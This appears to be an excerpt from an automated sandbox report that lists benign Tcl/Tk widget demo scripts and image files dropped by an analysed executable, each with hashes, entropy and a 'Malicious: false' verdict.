MD5:	B005708AAA4ABE1F11C6447284D54D32
SHA1:	93599683B9558FBEB07BFF9B07792BD34E1CA692
SHA-256:	A8D03AAAF372A201790EED7107F2024D73A024A850D1241B4A40AF08A33A2776
SHA-512:	79F4FCBDC507499FFF04CA29416E9168CCDF8D039B0425CB80C1C6430B8E6E987468CDBE3CFE790A142B438FA119305568941FF8DE14CE88A6EB8D3759DDC077
Malicious:	false
Preview:	::msgcat::mcset en "Widget Demonstration".::msgcat::mcset en "tkWidgetDemo".::msgcat::mcset en "&File".::msgcat::mcset en "About...".::msgcat::mcset en "&About...".::msgcat::mcset en "<F1>".::msgcat::mcset en "&Quit".::msgcat::mcset en "Meta+Q"..;# Displayed hotkey.::msgcat::mcset en "Meta-q"..;# Actual binding sequence.::msgcat::mcset en "Ctrl+Q"..;# Displayed hotkey.::msgcat::mcset en "Control-q"..;# Actual binding sequence.::msgcat::mcset en "Variable values".::msgcat::mcset en "Variable values:".::msgcat::mcset en "OK".::msgcat::mcset en "Run the \"%s\" sample program".::msgcat::mcset en "Dismiss".::msgcat::mcset en "Rerun Demo".::msgcat::mcset en "Demo code: %s".::msgcat::mcset en "About Widget Demo".::msgcat::mcset en "Tk widget demonstration application".::msgcat::mcset en "Copyright (c) %s" "Copyright \u00a9 %s".::msgcat::mcset en ". @@title. Tk Widget Demonstrations. @@newline. @@normal. @@newline.. This application provides a front end for several short scri

C:\Users\user\Desktop\tk\demos\entry1.tcl Download File
Process:	C:\Users\user\Desktop\GZe6EcSTpO.exe
File Type:	Unknown
Category:	dropped
Size (bytes):	1385
Entropy (8bit):	4.6554007890509395
Encrypted:	false
SSDEEP:	24:aJx14b7XeVXelq1KE7NhnJH/RsgIO1IGMqOUtDgT1pSJp:Is7Xekq8AVHpNIHEgTs
MD5:	329AB8926612765997401C22E7695BFC
SHA1:	1F870E7E38187965FFC6E6EBDC5F46E0E471C369
SHA-256:	A2789AB6867C3A88A199A7D5DABFCA0B77EA7482142FEBD7AC67B0D745C8907A
SHA-512:	F222362F6E2BEBF237F376A1C72FC48DBE9299BDF01A5F6ABADA64129119B58EBA12EC6F33A49A964EDC11C22C71784D5860EF62A47707D16B0588F9BA5B6D0D
Malicious:	false
Preview:	# entry1.tcl --.#.# This demonstration script creates several entry widgets without.# scrollbars...if {![info exists widgetDemo]} {. error "This script should be run from the \"widget\" demo.".}..package require Tk..set w .entry1.catch {destroy $w}.toplevel $w.wm title $w "Entry Demonstration (no scrollbars)".wm iconname $w "entry1".positionWindow $w..label $w.msg -font $font -wraplength 5i -justify left -text "Three different entries are displayed below. You can add characters by pointing, clicking and typing. The normal Motif editing characters are supported, along with many Emacs bindings. For example, Backspace and Control-h delete the character to the left of the insertion cursor and Delete and Control-d delete the chararacter to the right of the insertion cursor. For entries that are too large to fit in the window all at once, you can scan through the entries by dragging with mouse button2 pressed.".pack $w.msg -side top..## See Code / Dismiss buttons.set btns [addSeeDismi

C:\Users\user\Desktop\tk\demos\entry2.tcl Download File
Process:	C:\Users\user\Desktop\GZe6EcSTpO.exe
File Type:	Unknown
Category:	dropped
Size (bytes):	2111
Entropy (8bit):	4.717189025175301
Encrypted:	false
SSDEEP:	48:6iNnLXekf8uHk9XNIHExTUpFx/LDaE1xI4D6xN1DeFv:6unLOkUuHk9XNIkxTUVIdDeFv
MD5:	F318D597705A9109BD06C72BEF6A57ED
SHA1:	4A041BF891E814298918B60E7587D826E7EA751C
SHA-256:	FB439FC2735C25CC8C41A5EB393D598DB361AE8182A206A657AC71FA5D4FAE66
SHA-512:	735C1ADB30AE4236EF64917F4688495208AA994EB4742C216F0525184C4E0565552D8EB8CC35BB318BE6877B11B81D2DFE20E777171D30267A2924F4A042B47E
Malicious:	false
Preview:	# entry2.tcl --.#.# This demonstration script is the same as the entry1.tcl script.# except that it creates scrollbars for the entries...if {![info exists widgetDemo]} {. error "This script should be run from the \"widget\" demo.".}..package require Tk..set w .entry2.catch {destroy $w}.toplevel $w.wm title $w "Entry Demonstration (with scrollbars)".wm iconname $w "entry2".positionWindow $w..label $w.msg -font $font -wraplength 5i -justify left -text "Three different entries are displayed below, with a scrollbar for each entry. You can add characters by pointing, clicking and typing. The normal Motif editing characters are supported, along with many Emacs bindings. For example, Backspace and Control-h delete the character to the left of the insertion cursor and Delete and Control-d delete the chararacter to the right of the insertion cursor. For entries that are too large to fit in the window all at once, you can scan through the entries with the scrollbars, or by dragging with m

C:\Users\user\Desktop\tk\demos\entry3.tcl Download File
Process:	C:\Users\user\Desktop\GZe6EcSTpO.exe
File Type:	Unknown
Category:	dropped
Size (bytes):	6094
Entropy (8bit):	4.970085069374157
Encrypted:	false
SSDEEP:	96:KOkbWl+nSPcJ8DQvXwq027AKrXyqZ3Y9MSKrmpqjsGaQs3Jw3u3wLoHiSEkB1lQc:KOkbWGSPNOYg3ZSa2NQsBykNyU
MD5:	6664DFED8071987C251DC2E835487F44
SHA1:	98C5E4904FF9FC430FA4B771E280F86C8AF2E050
SHA-256:	A27AF490E8BF5735CB779CAE9AE6820CBE89EFC3B36BA161A5AD5DC39F1C857E
SHA-512:	7872042F3CFD09FF46471763EF76ED3A078868358F31F43FBDEA935D1599B2522269B03DF4BD56ADD0A1F5D34DDA5FD3C6FD3BA709A2F6447CF8EB84B86B3327
Malicious:	false
Preview:	# entry3.tcl --.#.# This demonstration script creates several entry widgets whose.# permitted input is constrained in some way. It also shows off a.# password entry...if {![info exists widgetDemo]} {. error "This script should be run from the \"widget\" demo.".}..package require Tk..set w .entry3.catch {destroy $w}.toplevel $w.wm title $w "Constrained Entry Demonstration".wm iconname $w "entry3".positionWindow $w..label $w.msg -font $font -wraplength 5i -justify left -text "Four different\..entries are displayed below. You can add characters by pointing,\..clicking and typing, though each is constrained in what it will\..accept. The first only accepts 32-bit integers or the empty string\..(checking when focus leaves it) and will flash to indicate any\..problem. The second only accepts strings with fewer than ten\..characters and sounds the bell when an attempt to go over the limit\..is made. The third accepts US phone numbers, mapping letters to\..their digit equivalent and sou

C:\Users\user\Desktop\tk\demos\filebox.tcl Download File
Process:	C:\Users\user\Desktop\GZe6EcSTpO.exe
File Type:	Unknown
Category:	dropped
Size (bytes):	2254
Entropy (8bit):	4.865462262291018
Encrypted:	false
SSDEEP:	48:w24XeD8h/l0QnTDU9RNbz441fj6TYS2dhfX6shL4Ti228zuS/tjA:w24Oo0QnT49RNf4Ufj6TYSshfX6shLQi
MD5:	6BD2EDBDFA73A8BB8A49BEE8D95DA963
SHA1:	F5D2010DC5B59FD63E530C074AFF2900BC5D9F69
SHA-256:	1BFF493A1A427B87F6795E00C3F83A53BE9B557FF4ACA3575E2D60B536DB4D1B
SHA-512:	8BA42A068B78AAE8FBC8E79278137A6D6A498D354DF056572019FC25DEEB7F5BA112DD01E151CB2D3D473978F005946B94779451A5CD438A911F1678FBA9F3AB
Malicious:	false
Preview:	# filebox.tcl --.#.# This demonstration script prompts the user to select a file...if {![info exists widgetDemo]} {. error "This script should be run from the \"widget\" demo.".}..package require Tk..set w .filebox.catch {destroy $w}.toplevel $w.wm title $w "File Selection Dialogs".wm iconname $w "filebox".positionWindow $w..label $w.msg -font $font -wraplength 4i -justify left -text "Enter a file name in the entry box or click on the \"Browse\" buttons to select a file name using the file selection dialog.".pack $w.msg -side top..## See Code / Dismiss buttons.set btns [addSeeDismiss $w.buttons $w].pack $btns -side bottom -fill x..foreach i {open save} {. set f [frame $w.$i]. label $f.lab -text "Select a file to $i: " -anchor e. entry $f.ent -width 20. button $f.but -text "Browse ..." -command "fileDialog $w $f.ent $i". pack $f.lab -side left. pack $f.ent -side left -expand yes -fill x. pack $f.but -side left. pack $f -fill x -padx 1c -pady 3.}..if {[tk windo

C:\Users\user\Desktop\tk\demos\floor.tcl Download File
Process:	C:\Users\user\Desktop\GZe6EcSTpO.exe
File Type:	Unknown
Category:	dropped
Size (bytes):	79098
Entropy (8bit):	4.648824039005886
Encrypted:	false
SSDEEP:	768:bA1APpAS+uxgBk/O/YwBWVhX7dWz5lBVTSZ8blAhOkyx29:8qPX+u+pYwBWVB7dWzrSgAhOky89
MD5:	4FC3094434BBBFD3E67E0AA0CFA066CB
SHA1:	2B86BCBD77969804291B0400E1AA11747B40637D
SHA-256:	4C5867F2D0F9ADB90347CD090E715256B6553EDBDB580DEBAA6780B853EFA94F
SHA-512:	D3F6B0962EF176B23D7C682F833DAF4A62D642D10B0DFA99BCCA5FDE1900B998CB5984AE88E5E01EDB7428E13F91DE000172BC28BE6ABC60B80C6B206D75BA72
Malicious:	false
Preview:	# floor.tcl --.#.# This demonstration script creates a canvas widet that displays the.# floorplan for DEC's Western Research Laboratory...if {![info exists widgetDemo]} {. error "This script should be run from the \"widget\" demo.".}..package require Tk..# floorDisplay --.# Recreate the floorplan display in the canvas given by "w". The.# floor given by "active" is displayed on top with its office structure.# visible..#.# Arguments:.# w -..Name of the canvas window..# active -.Number of active floor (1, 2, or 3)...proc floorDisplay {w active} {. global floorLabels floorItems colors activeFloor.. if {$activeFloor == $active} {..return. }.. $w delete all. set activeFloor $active.. # First go through the three floors, displaying the backgrounds for. # each floor... bg1 $w $colors(bg1) $colors(outline1). bg2 $w $colors(bg2) $colors(outline2). bg3 $w $colors(bg3) $colors(outline3).. # Raise the background for the active floor so that it's on top... $w

C:\Users\user\Desktop\tk\demos\form.tcl Download File
Process:	C:\Users\user\Desktop\GZe6EcSTpO.exe
File Type:	Unknown
Category:	dropped
Size (bytes):	1046
Entropy (8bit):	4.788650135767756
Encrypted:	false
SSDEEP:	24:XX14IOFFXeVXet1KAhzCOaU5KT1pzfxz77WAWLaWWSoC5qWG:VNKFXe082CRTLfxTWAWLaWWSoC5qWG
MD5:	E89BDF28E4CA261E64A522601C1BFA65
SHA1:	C194B14DECF26AF77E0BB98A1D46DE0DF8BB77EE
SHA-256:	85B46FC163748DD38256A5F46675F862A0296F28221A71983EDB8F917AA49065
SHA-512:	B50E243BF544DF0CC7DA9232D90A97C3AD588693E72FA71D2902AC587819322F81DF18E39707B57187C1823E7A673A22838F4C46C29D9AB74B997E7821B0CDBA
Malicious:	false
Preview:	# form.tcl --.#.# This demonstration script creates a simple form with a bunch.# of entry widgets...if {![info exists widgetDemo]} {. error "This script should be run from the \"widget\" demo.".}..package require Tk..set w .form.catch {destroy $w}.toplevel $w.wm title $w "Form Demonstration".wm iconname $w "form".positionWindow $w..label $w.msg -font $font -wraplength 4i -justify left -text "This window contains a simple form where you can type in the various entries and use tabs to move circularly between the entries.".pack $w.msg -side top..## See Code / Dismiss buttons.set btns [addSeeDismiss $w.buttons $w].pack $btns -side bottom -fill x..foreach i {f1 f2 f3 f4 f5} {. frame $w.$i -bd 2. entry $w.$i.entry -relief sunken -width 40. label $w.$i.label. pack $w.$i.entry -side right. pack $w.$i.label -side left.}.$w.f1.label config -text Name:.$w.f2.label config -text Address:.$w.f5.label config -text Phone:.pack $w.msg $w.f1 $w.f2 $w.f3 $w.f4 $w.f5 -side top -fill x.bi

C:\Users\user\Desktop\tk\demos\goldberg.tcl Download File
Process:	C:\Users\user\Desktop\GZe6EcSTpO.exe
File Type:	Unknown
Category:	dropped
Size (bytes):	56556
Entropy (8bit):	5.067380254503822
Encrypted:	false
SSDEEP:	768:Y2zGGafFkfIfGMqKfY3wCTvKOj1+mcptngVym61qBj7ZToqIX4J+5bnaoRX:Y2Xafo4GrKfWvKm1+Jmn7nIfmoh
MD5:	395A368F65DCF63BA1AC868A20BFF71C
SHA1:	B63DBDCEC938419EE72E8A0A0B9376D3BCA4AFE3
SHA-256:	D79A5EC48B2E411EE9A9BEBED5536583FCAAAE43533A7D47D0F52CAF6FD4F75D
SHA-512:	64AB15513227D38E5EA27D36414E3A695555525E40CC1E7F3BE1ABD1164A71D3496895FED511B39A4960AB336510CA9E236898093DCE1140A86C6D5C6D79DFAD
Malicious:	false
Preview:	##+#################################################################.#.# TkGoldberg.tcl.# by Keith Vetter, March 13, 2003.#.# "Man will always find a difficult means to perform a simple task".# Rube Goldberg.#.# Reproduced here with permission..#.##+#################################################################.#.# Keith Vetter 2003-03-21: this started out as a simple little program.# but was so much fun that it grew and grew. So I apologize about the.# size but I just couldn't resist sharing it..#.# This is a whizzlet that does a Rube Goldberg type animation, the.# design of which comes from an New Years e-card from IncrediMail..# That version had nice sound effects which I eschewed. On the other.# hand, that version was in black and white (actually dark blue and.# light blue) and this one is fully colorized..#.# One thing I learned from this project is that drawing filled complex.# objects on a canvas is really hard. More often than not I had to.# draw each item twice--once with t

C:\Users\user\Desktop\tk\demos\hello Download File
Process:	C:\Users\user\Desktop\GZe6EcSTpO.exe
File Type:	Unknown
Category:	dropped
Size (bytes):	509
Entropy (8bit):	4.6812207757121085
Encrypted:	false
SSDEEP:	12:MlFIpWQRipzyiCFzJQRnfg9J8Lg6YZedxQfNLbss4iA:MlFIzSzynJJQGpLZegf5ARr
MD5:	C345E2014709F3933E48DFF086DBD381
SHA1:	AC1CC773C4E388B56175A2203473BFF34F36DBC6
SHA-256:	9BF910B3E7FFCBB42D573C287803640708998B9103B41FA318A169257BE9D048
SHA-512:	3F3EBACE616657333A89C2456F4378BFD1B252B65F451C296E796E42A892F1862B64B633BA238ED7035937642594C3CD1439EEA555E35B6B7560CB53AF82C2D4
Malicious:	false
Preview:	#!/bin/sh.# the next line restarts using wish \.exec wish "$0" ${1+"$@"}..# hello --.# Simple Tk script to create a button that prints "Hello, world"..# Click on the button to terminate the program...package require Tk..# The first line below creates the button, and the second line.# asks the packer to shrink-wrap the application's main window.# around the button...button .hello -text "Hello, world" -command {. puts stdout "Hello, world"; destroy ..}.pack .hello..# Local Variables:.# mode: tcl.# End:.

C:\Users\user\Desktop\tk\demos\hscale.tcl Download File
Process:	C:\Users\user\Desktop\GZe6EcSTpO.exe
File Type:	Unknown
Category:	dropped
Size (bytes):	1497
Entropy (8bit):	4.851030673308719
Encrypted:	false
SSDEEP:	24:3EXXeVXeV1KU8G91haF8O1p8p7Q2RPcBo+NutlL4wNZTIiqhz728xz72A:WXe48xaOUpE2RPce+NutlE+TIiqhO8xl
MD5:	22134FBBDAE7EB2A81D4C5C56D6223F3
SHA1:	1ED917A08996453073A9A1DCE9B81963E3AB75BE
SHA-256:	63B7CCD36DF6390FCBADE2E92F4CB03DF7E0C953C720FD1FC6B227AF64DD0D51
SHA-512:	CBECC3E4D3050A2D3E89BC450FD7065FCA53CA39EF799B01216CFC377BB35BBAEFDD150F3421E6097C89922FBCCB9F02B355156DA2AB4C2ACB130BA51DC7F7EC
Malicious:	false
Preview:	# hscale.tcl --.#.# This demonstration script shows an example with a horizontal scale...if {![info exists widgetDemo]} {. error "This script should be run from the \"widget\" demo.".}..package require Tk..set w .hscale.catch {destroy $w}.toplevel $w.wm title $w "Horizontal Scale Demonstration".wm iconname $w "hscale".positionWindow $w..label $w.msg -font $font -wraplength 3.5i -justify left -text "An arrow and a horizontal scale are displayed below. If you click or drag mouse button 1 in the scale, you can change the length of the arrow.".pack $w.msg -side top -padx .5c..## See Code / Dismiss buttons.set btns [addSeeDismiss $w.buttons $w].pack $btns -side bottom -fill x..frame $w.frame -borderwidth 10.pack $w.frame -side top -fill x..canvas $w.frame.canvas -width 50 -height 50 -bd 0 -highlightthickness 0.$w.frame.canvas create polygon 0 0 1 1 2 2 -fill DeepSkyBlue3 -tags poly.$w.frame.canvas create line 0 0 1 1 2 2 0 0 -fill black -tags line.scale $w.frame.scale -orient horizontal

C:\Users\user\Desktop\tk\demos\icon.tcl Download File
Process:	C:\Users\user\Desktop\GZe6EcSTpO.exe
File Type:	Unknown
Category:	dropped
Size (bytes):	2063
Entropy (8bit):	4.795726085495706
Encrypted:	false
SSDEEP:	48:mZBGXez87xyIDTaP9q71JX1JN1Jq1JVpGf1vf611S1h:POYNZTgor5WhIfFfMsz
MD5:	0F894E47B4B0152B41EDEF766EAC1621
SHA1:	0891CAD656E637C4314BD080022F71757B8245F6
SHA-256:	D7E3D2E8A558D2AA58064F4EB39F4689566DD8FEE87A79267BE5E42B9FFDCCB4
SHA-512:	A219B77027136D124F3E033C9D7853C2E35EA84152AB1B32F817C4FF7BA2BD3EDBD7B9934EA5D81BF7E191817A95A1E397CFD0441ABE0CB2DEF949E5A7F9A6F5
Malicious:	false
Preview:	# icon.tcl --.#.# This demonstration script creates a toplevel window containing.# buttons that display bitmaps instead of text...if {![info exists widgetDemo]} {. error "This script should be run from the \"widget\" demo.".}..package require Tk..set w .icon.catch {destroy $w}.toplevel $w.wm title $w "Iconic Button Demonstration".wm iconname $w "icon".positionWindow $w..label $w.msg -font $font -wraplength 5i -justify left -text "This window shows three ways of using bitmaps or images in radiobuttons and checkbuttons. On the left are two radiobuttons, each of which displays a bitmap and an indicator. In the middle is a checkbutton that displays a different image depending on whether it is selected or not. On the right is a checkbutton that displays a single bitmap but changes its background color to indicate whether or not it is selected.".pack $w.msg -side top..## See Code / Dismiss buttons.set btns [addSeeDismiss $w.buttons $w].pack $btns -side bottom -fill x..# Main widget pro

C:\Users\user\Desktop\tk\demos\image1.tcl Download File
Process:	C:\Users\user\Desktop\GZe6EcSTpO.exe
File Type:	Unknown
Category:	dropped
Size (bytes):	1002
Entropy (8bit):	4.776654238582859
Encrypted:	false
SSDEEP:	24:1jFXeVXe/1KmGB1hzYEmB1T1pSP9qitZfs261pjxItZwsU61pJxj:rXe68xcTaP9qitFQ1pjxItag1pJxj
MD5:	7D19DC124052DFC454D170C5E1BABE4B
SHA1:	AD0ED3A4E50A7E07AA3C1A4D9199E186311E3B59
SHA-256:	26ECCBB1A9FED9A5E25EC9AAD29A1DE7034577C61D93E17BD0FB07EAAA06C5FE
SHA-512:	40515F7757575B1E4E9B3838468362DDA1229C1F9BDE71FA40B129B379655F2BB3F24CEF4FCCE2EC1F736FCDF7B8C0425F69806C9E9A656FF86A738F2ED7B056
Malicious:	false
Preview:	# image1.tcl --.#.# This demonstration script displays two image widgets...if {![info exists widgetDemo]} {. error "This script should be run from the \"widget\" demo.".}..package require Tk..set w .image1.catch {destroy $w}.toplevel $w.wm title $w "Image Demonstration #1".wm iconname $w "Image1".positionWindow $w..label $w.msg -font $font -wraplength 4i -justify left -text "This demonstration displays two images, each in a separate label widget.".pack $w.msg -side top..## See Code / Dismiss buttons.set btns [addSeeDismiss $w.buttons $w].pack $btns -side bottom -fill x..# Main widget program sets variable tk_demoDirectory.catch {image delete image1a}.image create photo image1a -file [file join $tk_demoDirectory images earth.gif].label $w.l1 -image image1a -bd 1 -relief sunken..catch {image delete image1b}.image create photo image1b \..-file [file join $tk_demoDirectory images earthris.gif].label $w.l2 -image image1b -bd 1 -relief sunken..pack $w.l1 $w.l2 -side top -padx .5m -pady .5

C:\Users\user\Desktop\tk\demos\image2.tcl Download File
Process:	C:\Users\user\Desktop\GZe6EcSTpO.exe
File Type:	Unknown
Category:	dropped
Size (bytes):	3362
Entropy (8bit):	4.821299073967508
Encrypted:	false
SSDEEP:	96:yWOjAyO7nBjIgVHPPeAK5TUS1WqflkaGDxuJ3Aht3U:yWOjjO7nBjIgV3eAK5qqlkTxuJkE
MD5:	C91D4E62B9DAA0C81B5D58553117F704
SHA1:	AF8033D7429DEC01911BB230C5E3D76739737371
SHA-256:	A7BD59DFBF1E8A3A19E85249003DE2B2430E3BDB0F7F8CDD691878DFDF7027AD
SHA-512:	1881C3BEB157221ED79FCDE99F51476A6E6B65D6FE44FA5C30D650960E0BFE9693E18E6BD1C38B42D6C2FA3286B3287B9F75F647E657F9E2F9B1AB8DE1FC94D3
Malicious:	false
Preview:	# image2.tcl --.#.# This demonstration script creates a simple collection of widgets.# that allow you to select and view images in a Tk label...if {![info exists widgetDemo]} {. error "This script should be run from the \"widget\" demo.".}..package require Tk..# loadDir --.# This procedure reloads the directory listbox from the directory.# named in the demo's entry..#.# Arguments:.# w -...Name of the toplevel window of the demo...proc loadDir w {. global dirName.. $w.f.list delete 0 end. foreach i [lsort [glob -type f -directory $dirName *]] {..$w.f.list insert end [file tail $i]. }.}..# selectAndLoadDir --.# This procedure pops up a dialog to ask for a directory to load into.# the listobx and (if the user presses OK) reloads the directory.# listbox from the directory named in the demo's entry..#.# Arguments:.# w -...Name of the toplevel window of the demo...proc selectAndLoadDir w {. global dirName. set dir [tk_chooseDirectory -initialdir $dirName -parent $w -must

C:\Users\user\Desktop\tk\demos\images\earth.gif Download File
Process:	C:\Users\user\Desktop\GZe6EcSTpO.exe
File Type:	Unknown
Category:	dropped
Size (bytes):	51712
Entropy (8bit):	7.787642153262278
Encrypted:	false
SSDEEP:	768:vd6Oy1DMq/KpYFcH7XycireZMjfnPxm0Yo9p+zUxSsKYjNl9GrFyXoEDP1w:vd6R1DMQKouCcHZwPWE/xSMjNlCQ+
MD5:	34D2114D2AC22DD7F97232D241402028
SHA1:	D2510C1DB0F35051E8DF7EAC0E0C522DA535175E
SHA-256:	88AF7AE24FD08D5EB144E938A4381D28638BC50D15C8E5F3E30CA73B0FBA961F
SHA-512:	3A224D73971B94F0406BB290886756859801F596C729D8806F74E039CA3C4B35158FA0CE506F5583D7B67CDCB7197FE93C82A3A6F9CF9FA108DCBB645137202B
Malicious:	false
Preview:	GIF87a@................................................................. .. .. .. .. .. .. . ..(. (( 00(88(88(@80@@0@H0@H8@80H@0HH0H88H@8HH8HP8HX8HH@HP@HX@H`@H80P@0P88P@8PH8PP8P@@PH@PP@PX@P`@PPHPXHP`HPhHP88X@8XH8XP8X@@XH@XP@XX@XHHXPHXXHX`HXhHXXPX`PXhPXpPXhXX@@`H@`P@`HH`PH`XH``H`PP`XP``P`hP`pP``X`hX`pX`xX`p``x``H@hHHhPHhXHh`HhPPhXPh`PhhPhpPhXXh`XhhXhpXhxXhh`hp`hx`h.`hxhh.hh.hhPPpXPp`PpXXp`XphXppXph`pp`px`p.`pphpxhp.hp.hp.hp.pp.pp.pp.pp.xp.xpPPxXXx`XxhXxh`xp`xx`xphxxhx.hx.hxxpx.px.px.px.px.xx.xx.xx.xx..x..x..x..xh`.ph.xh.xp..p..p..x..x..x..x..x.............................x..x..x........................................................................................................................................................................................,....@........0X@.......4@..B...:<. .....D\|H.AC..+~l8`c....D.."G...Z. ......X....../...s..+Z......_.x.....S`Uy.....0H\|..3............P..6gN.....0.....&.....].v......]..t:F.6m..o..&lA.e..0\H...h.i1D...C...b...5..

C:\Users\user\Desktop\tk\demos\images\earthris.gif Download File
Process:	C:\Users\user\Desktop\GZe6EcSTpO.exe
File Type:	Unknown
Category:	dropped
Size (bytes):	6343
Entropy (8bit):	7.60421228624189
Encrypted:	false
SSDEEP:	192:EeSDPfecM7mHVhEje/tL6qaOdROJ3NZq7wtZ2aGIFD:rGfPV+iL6qa5c7wm4D
MD5:	4D10E3A9B9C5CC5AB490962AFA9BFE6C
SHA1:	59609B8A8F221D3FC1CB58D3BF5C7E58104E3FDB
SHA-256:	C2DA473E55D8317BD1F983638ADB729BFF1461DE590D76F99D8B3430C71E0F6E
SHA-512:	FBE2B0C4E8FE413E840884E706D13764218677E0249EAFA25252C2045F5F17ED69B98E6C0D49F55E3E7EC382FDE388A9EC785423FB6D5A35B47726288AF39AD8
Malicious:	false
Preview:	GIF87a@..........I$..I....mI.m..m$.......m..m..I.........m$.........$...mIIm.$m....m$.....mI$...$m...I.$I...mI$..mmI..II.$$.....mm.....I$.$..$.....I.m$$.II......I..I.I...mm..m......mm.$$m....$...m....m.............m.$mm.....II$ImI..I..m.....$I............$..I..m$.mII.I..mm..mm.m.....$.....I$........I.I..I$$.m$$.$I.m..m..m..m..m......m........mI.$..m....Im.m....$.$$.I$$.$$I$$m$II$mm$m.$.m$..I.$I$II$.I$.II.IIIIm$ImII..I..mm$mmImm.m.Im.....Im.I.m..m..I....m..m...m........$I.I..I$.....$..I........................................................................................................................................................................................................................................................................,....@...@......H......\....#J.H....3j.... C..I...(S.\...0c.I...8s.....@...J...H.].....&H.@....W.J.....1.P..`....PL.t.... .\...A..."..;._.*...Kx.....Sl.WG........V...E.j7....&t8.....o8.`...../..;'.Y.

C:\Users\user\Desktop\tk\demos\images\face.xbm Download File
Process:	C:\Users\user\Desktop\GZe6EcSTpO.exe
File Type:	Unknown
Category:	dropped
Size (bytes):	12720
Entropy (8bit):	3.2363430013593097
Encrypted:	false
SSDEEP:	192:mgnWrCRcJ/aqc8G4lfBTdzeAyVfEW66tq+rfmgZ7tIuwA:mg8zeAycvG9Zx
MD5:	72289219C6E1CF81933695BA5AC5CCBC
SHA1:	C1E083DEBCA3B8AC6D4879673A111B8D86F5C1FA
SHA-256:	4562864428E9AB64E7069A53DF022D6B4E6B4BD6C5A56B8CBC22606E2B73BC15
SHA-512:	87AFF266D6A2BD90EB53D2D49F6AE6581B0B6F30328F5C80D273E11D45D94C9C09834DD31E31B0F39E87CB027F4C5C65F06501880F6BEE81BE8C8AD21333531C
Malicious:	false
Preview:	#define face_width 108.#define face_height 144.#define face_x_hot 48.#define face_y_hot 80.static char face_bits[] = {. 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x20, 0x00, 0x00, 0x00,. 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x08, 0x09,. 0x20, 0x80, 0x24, 0x05, 0x00, 0x80, 0x08, 0x00, 0x00, 0x00, 0x00, 0x88,. 0x24, 0x20, 0x80, 0x24, 0x00, 0x00, 0x00, 0x10, 0x80, 0x04, 0x00, 0x01,. 0x00, 0x01, 0x40, 0x0a, 0x09, 0x00, 0x92, 0x04, 0x80, 0x00, 0x00, 0x00,. 0x00, 0x00, 0x10, 0x40, 0x12, 0x00, 0x00, 0x10, 0x40, 0x00, 0x00, 0x84,. 0x24, 0x40, 0x22, 0xa8, 0x02, 0x14, 0x84, 0x92, 0x40, 0x42, 0x12, 0x04,. 0x10, 0x00, 0x00, 0x00, 0x00, 0x52, 0x00, 0x52, 0x11, 0x00, 0x12, 0x00,. 0x40, 0x02, 0x00, 0x20, 0x00, 0x08, 0x00, 0xaa, 0x02, 0x54, 0x85, 0x24,. 0x00, 0x10, 0x12, 0x00, 0x00, 0x81, 0x44, 0x00, 0x90, 0x5a, 0x00, 0xea,. 0x1b, 0x00, 0x80, 0x40, 0x40, 0x02, 0x00, 0x08, 0x00, 0x20, 0xa2, 0x05,. 0x8a, 0xb4, 0x6e, 0x45, 0x12, 0x04, 0x08, 0x00, 0x00,

C:\Users\user\Desktop\tk\demos\images\flagdown.xbm Download File
Process:	C:\Users\user\Desktop\GZe6EcSTpO.exe
File Type:	Unknown
Category:	dropped
Size (bytes):	1886
Entropy (8bit):	2.9635499077219185
Encrypted:	false
SSDEEP:	12:HeBIaLwMkAXnkwBL/vM6Ek4LSaaSIrmWXTvaeLmdqZV:HMkAXnLUHSah+mWNLn
MD5:	58780D97D475DEDA11002487DB440A9F
SHA1:	608D3A69F4559A1DBA07E17FF1C2AC91E0E51B75
SHA-256:	13EA2A1169BAE3A517804C7DCC2F106AC3B29B0ADE5197D6546A9C8CF486E967
SHA-512:	8E9F34551C6635A6321E3ADB1969E21E8AC373D546AAD54DE448E1B4166EC375A213E7112B47784D5AF6E66FB4AE07555DFAF3CBC8EB48212B7D85425678B677
Malicious:	false
Preview:	#define flagdown_width 48.#define flagdown_height 48.static char flagdown_bits[] = {. 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,. 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x1e, 0x00, 0x00,. 0x00, 0x00, 0x80, 0x7f, 0x00, 0x00, 0x00, 0x00, 0xe0, 0xe1, 0x00, 0x00,. 0x00, 0x00, 0x70, 0x80, 0x01, 0x00, 0x00, 0x00, 0x18, 0x00, 0x03, 0x00,. 0x00, 0x00, 0x0c, 0x00, 0x03, 0x00, 0x00, 0x00, 0x06, 0x00, 0x06, 0x04,. 0x00, 0x00, 0x03, 0x00, 0x06, 0x06, 0x00, 0x80, 0x01, 0x00, 0x06, 0x07,. 0x00, 0xc0, 0x1f, 0x00, 0x87, 0x07, 0x00, 0xe0, 0x7f, 0x80, 0xc7, 0x07,. 0x00, 0x70, 0xe0, 0xc0, 0xe5, 0x07, 0x00, 0x38, 0x80, 0xe1, 0x74, 0x07,. 0x00, 0x18, 0x80, 0x71, 0x3c, 0x07, 0x00, 0x0c, 0x00, 0x3b, 0x1e, 0x03,. 0x00, 0x0c, 0x00, 0x1f, 0x0f, 0x00, 0x00, 0x86, 0x1f, 0x8e, 0x07, 0x00,. 0x00, 0x06, 0x06, 0xc6, 0x05, 0x00, 0x00, 0x06, 0x00, 0xc6, 0x05, 0x00,. 0x00, 0x06, 0x00, 0xc6, 0x04, 0x00, 0x00, 0x06, 0x00, 0x06, 0x04, 0x00,. 0x7f, 0x06,

C:\Users\user\Desktop\tk\demos\images\flagup.xbm Download File
Process:	C:\Users\user\Desktop\GZe6EcSTpO.exe
File Type:	Unknown
Category:	dropped
Size (bytes):	1880
Entropy (8bit):	3.1723364661245337
Encrypted:	false
SSDEEP:	24:DfCbsiV5TiKwUcvvaYKgKrgKV/gKiBgKhBgKhBgKwgKAgK1:DqbTidUcHbKgsgegxgggggTgTg6
MD5:	59738D533223C79AF81EB929BFF19B02
SHA1:	3A2FA6D6145A0BD4D3A269415EFF8C137F69F6B6
SHA-256:	6E31DE3423EC63534C36ADCBF1C9872FAB21C5C2999511505F7321FC794CB7EC
SHA-512:	6407891FB40118984744719D1B2FABDE68586010DDDC8CFB4FE84342230100F8D73583ABA4BD493CC2A36B4EE3267B197B337BC1BFD898D907961ED5A49AD578
Malicious:	false
